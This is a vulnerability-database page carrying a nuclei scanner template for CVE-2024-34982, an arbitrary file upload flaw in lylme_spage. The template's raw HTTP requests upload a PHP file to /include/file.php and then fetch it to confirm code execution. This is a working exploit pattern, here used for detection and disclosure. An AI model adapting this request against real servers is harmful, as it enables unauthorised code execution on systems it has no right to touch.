Lucene search
K

LyLme-Spage - Arbitary File Upload

🗓️ 03 Jul 2026 03:01:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 56 Views

LyLme-Spage - Arbitrary File Upload vulnerability in lylme_spage v1.9.5 allows arbitrary code execution via crafted file upload

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNNVD
LyLme Spage 安全漏洞
17 May 202400:00
cnnvd
CVE
CVE-2024-34982
17 May 202413:41
cve
Cvelist
CVE-2024-34982
17 May 202413:41
cvelist
NVD
CVE-2024-34982
17 May 202414:15
nvd
Positive Technologies
PT-2024-26275 · Unknown · Lylme Spage
17 May 202400:00
ptsecurity
RedhatCVE
CVE-2024-34982
9 Jan 202609:35
redhatcve
Vulnrichment
CVE-2024-34982
17 May 202413:41
vulnrichment
id: CVE-2024-34982

info:
  name: LyLme-Spage - Arbitary File Upload
  author: DhiyaneshDk
  severity: high
  description: |
    An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file.
  impact: |
    Attackers can upload arbitrary files to execute malicious code on the LyLme-Spage server.
  remediation: |
    Update LyLme Spage to a version later than 1.9.5 that patches the arbitrary file upload vulnerability.
  reference:
    - https://github.com/n2ryx/CVE/blob/main/Lylme_pagev1.9.5.md
    - https://github.com/tanjiti/sec_profile
    - https://github.com/ATonysan/poc-exp/blob/main/60NavigationPage_CVE-2024-34982_ArbitraryFileUploads.py
  classification:
    epss-score: 0.04675
    epss-percentile: 0.90655
    cpe: cpe:2.3:a:lylme:lylme_spage:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: lylme
    product: lylme_spage
    fofa-query: icon_hash="-282504889"
  tags: cve,cve2024,lylme-spage,rce,intrusive,vuln

variables:
  string: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /include/file.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------575673989461736

        -----------------------------575673989461736
        Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
        Content-Type: image/png

        <?php echo "{{string}}";unlink(__FILE__);?>
        -----------------------------575673989461736--

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"code":'
          - '"msg":'
          - '"url":'
          - 'php"}'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: path
        part: body
        group: 1
        regex:
          - '"url":"([/a-z_0-9.]+)"'
        internal: true

  - raw:
      - |
        GET {{path}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{{string}}" )'
          - 'contains(header, "text/html")'
        condition: and
# digest: 490a00463044022041f71fe3a4fe26cb03df5b799848cea6d8996df51a53d21378146f3e8d2dfba902207434ae9b119e72a85a330b0bbe06a34078c7685971ecbc6022ecf8f02a6b6db9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 3.19.8
EPSS0.04675
SSVC
56